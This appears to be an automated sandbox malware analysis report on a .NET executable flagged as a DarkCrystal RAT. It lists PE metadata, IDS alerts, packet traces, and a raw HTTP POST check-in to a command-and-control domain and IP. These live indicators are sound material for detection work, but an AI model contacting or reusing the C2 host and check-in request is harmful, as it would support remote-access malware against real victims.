                                                                          Time Stamp:0x6749EC6C [Fri Nov 29 16:31:40 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1d58100x4b.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d60000x320.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d80000xc.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x20000x1d38640x1d3a00ccc75a4b741ae284a0780af580f266f2False0.7785137454891741data7.542820283476374IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x1d60000x3200x4003720f37e3ecb95f78fcf18a649002524False0.3525390625data2.6537284131589467IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .reloc0x1d80000xc0x20015cfe4d3fde5610987a754c2b181bad0False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_VERSION0x1d60580x2c8data0.46207865168539325

                                                                          Imports

                                                                          DLLImport
                                                                          mscoree.dll_CorExeMain

                                                                          Network Behavior

                                                                          Suricata IDS Alerts

                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2025-01-08T19:22:12.441622+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44973037.44.238.25080TCP
                                                                          2025-01-08T19:22:16.937599+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44973537.44.238.25080TCP
                                                                          2025-01-08T19:22:23.010082+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44973837.44.238.25080TCP
                                                                          2025-01-08T19:22:26.775231+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44973937.44.238.25080TCP
                                                                          2025-01-08T19:22:49.408027+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44974037.44.238.25080TCP
                                                                          2025-01-08T19:22:58.845549+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44975337.44.238.25080TCP
                                                                          2025-01-08T19:23:01.873573+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44976937.44.238.25080TCP
                                                                          2025-01-08T19:23:09.111175+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44980537.44.238.25080TCP
                                                                          2025-01-08T19:23:12.439331+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44982637.44.238.25080TCP
                                                                          2025-01-08T19:23:15.569473+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44984137.44.238.25080TCP
                                                                          2025-01-08T19:23:19.060915+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44985637.44.238.25080TCP
                                                                          2025-01-08T19:23:45.937610+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44999837.44.238.25080TCP
                                                                          2025-01-08T19:23:54.634534+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.45001637.44.238.25080TCP
                                                                          2025-01-08T19:23:58.095640+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.45001737.44.238.25080TCP
                                                                          2025-01-08T19:24:02.259011+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.45001837.44.238.25080TCP
                                                                          2025-01-08T19:24:20.595673+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.45001937.44.238.25080TCP
                                                                          2025-01-08T19:24:31.736429+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.45002037.44.238.25080TCP

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 8, 2025 19:22:11.649537086 CET4973080192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:11.654356956 CET804973037.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:11.657385111 CET4973080192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:11.657777071 CET4973080192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:11.662550926 CET804973037.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:12.002999067 CET4973080192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:12.007896900 CET804973037.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:12.305756092 CET804973037.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:12.441554070 CET804973037.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:12.441622019 CET4973080192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:13.190783024 CET4973080192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:15.934999943 CET4973580192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:15.939821005 CET804973537.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:15.939913034 CET4973580192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:15.940177917 CET4973580192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:16.152909994 CET804973537.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:16.298755884 CET4973580192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:16.303589106 CET804973537.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:16.805242062 CET804973537.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:16.937552929 CET804973537.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:16.937598944 CET4973580192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:17.216625929 CET4973580192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:22.238842964 CET4973880192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:22.243824005 CET804973837.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:22.243897915 CET4973880192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:22.244183064 CET4973880192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:22.248979092 CET804973837.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:22.595662117 CET4973880192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:22.600553989 CET804973837.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:22.875893116 CET804973837.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:23.010027885 CET804973837.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:23.010082006 CET4973880192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:23.430918932 CET4973880192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:25.978754044 CET4973980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:25.983726025 CET804973937.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:25.983803034 CET4973980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:25.984175920 CET4973980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:25.988967896 CET804973937.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:26.330033064 CET4973980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:26.334984064 CET804973937.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:26.641211033 CET804973937.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:26.775063992 CET804973937.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:26.775230885 CET4973980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:27.828078032 CET4973980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:48.721496105 CET4974080192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:48.726375103 CET804974037.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:48.726454973 CET4974080192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:48.726655960 CET4974080192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:48.731457949 CET804974037.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:49.080116987 CET4974080192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:49.084980011 CET804974037.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:49.359955072 CET804974037.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:49.408026934 CET4974080192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:49.706486940 CET804974037.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:49.707182884 CET804974037.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:49.707256079 CET4974080192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:49.776595116 CET4974080192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:58.150146008 CET4975380192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:58.155093908 CET804975337.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:58.155194044 CET4975380192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:58.155389071 CET4975380192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:58.160152912 CET804975337.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:58.501976013 CET4975380192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:58.506788015 CET804975337.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:58.784297943 CET804975337.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:58.845549107 CET4975380192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:58.917509079 CET804975337.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:22:59.033087969 CET4975380192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:22:59.216593981 CET4975380192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:01.111718893 CET4976980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:01.116622925 CET804976937.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:01.116867065 CET4976980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:01.117084026 CET4976980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:01.121826887 CET804976937.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:01.470721006 CET4976980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:01.475501060 CET804976937.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:01.745446920 CET804976937.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:01.873406887 CET804976937.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:01.873573065 CET4976980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:02.541802883 CET4976980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:08.406455994 CET4980580192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:08.411250114 CET804980537.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:08.411309958 CET4980580192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:08.411525965 CET4980580192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:08.416266918 CET804980537.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:08.767712116 CET4980580192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:08.772559881 CET804980537.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:09.060656071 CET804980537.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:09.111175060 CET4980580192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:09.193443060 CET804980537.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:09.291229963 CET4980580192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:11.693057060 CET4982680192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:11.697906971 CET804982637.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:11.697981119 CET4982680192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:11.698177099 CET4982680192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:11.702924013 CET804982637.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:12.048922062 CET4982680192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:12.053785086 CET804982637.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:12.346187115 CET804982637.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:12.439331055 CET4982680192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:12.477238894 CET804982637.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:12.553014040 CET4982680192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:12.570622921 CET4982680192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:14.807156086 CET4984180192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:14.811985016 CET804984137.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:14.812046051 CET4984180192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:14.812264919 CET4984180192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:14.817003012 CET804984137.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:15.158229113 CET4984180192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:15.162986994 CET804984137.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:15.442372084 CET804984137.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:15.569325924 CET804984137.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:15.569473028 CET4984180192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:15.826926947 CET4984180192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:17.645373106 CET4985680192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:17.650244951 CET804985637.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:17.650300980 CET4985680192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:17.650572062 CET4985680192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:17.655323982 CET804985637.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:18.001960039 CET4985680192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:18.006867886 CET804985637.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:19.060506105 CET804985637.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:19.060866117 CET804985637.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:19.060914040 CET804985637.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:19.060914993 CET4985680192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:19.060954094 CET4985680192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:19.061033964 CET804985637.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:19.061073065 CET4985680192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:19.358352900 CET4985680192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:45.134325981 CET4999880192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:45.139194965 CET804999837.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:45.139257908 CET4999880192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:45.139482975 CET4999880192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:45.144270897 CET804999837.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:45.486376047 CET4999880192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:45.491169930 CET804999837.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:45.799418926 CET804999837.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:45.937529087 CET804999837.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:45.937609911 CET4999880192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:46.181305885 CET4999880192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:53.860385895 CET5001680192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:53.865712881 CET805001637.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:53.865775108 CET5001680192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:53.866105080 CET5001680192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:53.870852947 CET805001637.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:54.220882893 CET5001680192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:54.225722075 CET805001637.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:54.503763914 CET805001637.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:54.634469032 CET805001637.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:54.634533882 CET5001680192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:55.266405106 CET5001680192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:57.379925013 CET5001780192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:57.384814978 CET805001737.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:57.387358904 CET5001780192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:57.387593985 CET5001780192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:57.392385960 CET805001737.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:57.740959883 CET5001780192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:57.745829105 CET805001737.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:58.040276051 CET805001737.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:58.095639944 CET5001780192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:58.173022985 CET805001737.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:58.390559912 CET805001737.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:23:58.390603065 CET5001780192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:23:58.718756914 CET5001780192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:01.453346968 CET5001880192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:01.458226919 CET805001837.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:24:01.458303928 CET5001880192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:01.458509922 CET5001880192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:01.463249922 CET805001837.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:24:01.814564943 CET5001880192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:01.819380045 CET805001837.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:24:02.124489069 CET805001837.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:24:02.258925915 CET805001837.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:24:02.259011030 CET5001880192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:02.410572052 CET5001880192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:19.920655012 CET5001980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:19.925839901 CET805001937.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:24:19.925909042 CET5001980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:19.926120043 CET5001980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:19.930924892 CET805001937.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:24:20.283421993 CET5001980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:20.288244009 CET805001937.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:24:20.554718971 CET805001937.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:24:20.595673084 CET5001980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:20.685286999 CET805001937.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:24:20.736301899 CET5001980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:20.759145975 CET5001980192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:30.987978935 CET5002080192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:30.992918968 CET805002037.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:24:30.992991924 CET5002080192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:30.993206024 CET5002080192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:30.997961998 CET805002037.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:24:31.345933914 CET5002080192.168.2.437.44.238.250
                                                                          Jan 8, 2025 19:24:31.350810051 CET805002037.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:24:31.692440033 CET805002037.44.238.250192.168.2.4
                                                                          Jan 8, 2025 19:24:31.736428976 CET5002080192.168.2.437.44.238.250

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 8, 2025 19:22:11.635302067 CET5431353192.168.2.41.1.1.1
                                                                          Jan 8, 2025 19:22:11.644741058 CET53543131.1.1.1192.168.2.4

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Jan 8, 2025 19:22:11.635302067 CET192.168.2.41.1.1.10xf0faStandard query (0)505905cm.n9shka.topA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Jan 8, 2025 19:22:11.644741058 CET1.1.1.1192.168.2.40xf0faNo error (0)505905cm.n9shka.top37.44.238.250A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • 505905cm.n9shka.top

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.44973037.44.238.250808256C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 8, 2025 19:22:11.657777071 CET315OUTPOST /imagePollLinuxCentral.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                          Host: 505905cm.n9shka.top
                                                                          Content-Length: 344
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jan 8, 2025 19:22:12.002999067 CET344OUTData Raw: 00 07 04 01 03 0f 01 04 05 06 02 01 02 04 01 07 00 07 05 08 02 03 03 08 01 06 0d 02 03 00 02 09 0a 03 05 0a 03 54 03 07 0b 04 04 03 00 06 05 56 05 03 0c 0a 0e 02 07 0b 07 05 07 04 01 0b 00 0b 02 00 0d 59 07 06 04 01 0b 04 0f 03 0d 53 0e 09 05 54
                                                                          Data Ascii: TVYSTZVTU\L~Ah^bOcq~XaKURhRX]`lpO~sk_lU|^o`uZknl`^|i_~V@@{}fA~Lq
                                                                          Jan 8, 2025 19:22:12.305756092 CET25INHTTP/1.1 100 Continue
                                                                          Jan 8, 2025 19:22:12.441554070 CET376INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Wed, 08 Jan 2025 18:22:12 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 213
                                                                          Connection: keep-alive
